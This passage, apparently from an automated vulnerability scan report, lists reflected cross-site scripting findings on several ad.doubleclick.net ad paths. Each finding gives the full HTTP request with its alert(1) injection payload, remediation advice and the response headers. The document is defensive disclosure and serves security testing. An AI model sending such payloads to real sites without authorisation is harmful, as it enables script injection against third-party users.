The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d928'-alert(1)-'36a092fd59c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/interactive.wsj.com/markets_front?3d928'-alert(1)-'36a092fd59c=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 352 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:11:42 GMT Expires: Sat, 06 Nov 2010 16:11:42 GMT Connection: close
1.62. http://ad.doubleclick.net/adj/marketwatch.com/frontpage [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/marketwatch.com/frontpage
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd164'-alert(1)-'457a3895181 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/marketwatch.com/frontpage;s=8_10001;u=%5e%5elA;sz=300x250,336x280;tile=6;ord=1242115728?&dd164'-alert(1)-'457a3895181=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.marketwatch.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 07 Nov 2010 09:29:00 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 422
1.63. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_pg_dwnld_mobile_p77_immersion [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95522'-alert(1)-'68c40687c6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.sourceforge/cons_pg_dwnld_mobile_p77_immersion?95522'-alert(1)-'68c40687c6b=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 311 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 06:34:29 GMT Expires: Sun, 07 Nov 2010 06:34:29 GMT Connection: close
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fce2f'%3balert(1)//4d21735db26 was submitted in the pg parameter. This input was echoed as fce2f';alert(1)//4d21735db26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.sourceforge/cons_pg_dwnld_mobile_p77_immersion;pg=fce2f'%3balert(1)//4d21735db26 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://sourceforge.net/projects/filezilla/files/FileZilla_Client/3.3.4.1/FileZilla_3.3.4.1_win32-setup.exe/download Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 312 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:36:48 GMT Expires: Sat, 06 Nov 2010 16:36:48 GMT
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86576'-alert(1)-'ba08ff4fb80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.sourceforge/cons_pg_dwnld_mobile_p97_wrapper?86576'-alert(1)-'ba08ff4fb80=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 311 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 06:34:29 GMT Expires: Sun, 07 Nov 2010 06:34:29 GMT Connection: close
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83ca9'%3balert(1)//8fc0e683942 was submitted in the pg parameter. This input was echoed as 83ca9';alert(1)//8fc0e683942 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.sourceforge/cons_pg_dwnld_mobile_p97_wrapper;pg=83ca9'%3balert(1)//8fc0e683942 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://sourceforge.net/projects/filezilla/files/FileZilla_Client/3.3.4.1/FileZilla_3.3.4.1_win32-setup.exe/download Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 312 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:36:40 GMT Expires: Sat, 06 Nov 2010 16:36:40 GMT
The value of the columns request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52b73'%3balert(1)//695156bcc6c was submitted in the columns parameter. This input was echoed as 52b73';alert(1)//695156bcc6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/smartmoney.com/frontpage;columns=52b73'%3balert(1)//695156bcc6c HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.smartmoney.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 432 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:01:55 GMT Expires: Sat, 06 Nov 2010 16:01:55 GMT
1.68. http://ad.doubleclick.net/adj/smartmoney.com/frontpage [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/smartmoney.com/frontpage
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 908aa'-alert(1)-'08d5484cd5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/smartmoney.com/frontpage?908aa'-alert(1)-'08d5484cd5f=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 427 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:11:47 GMT Expires: Sat, 06 Nov 2010 16:11:47 GMT Connection: close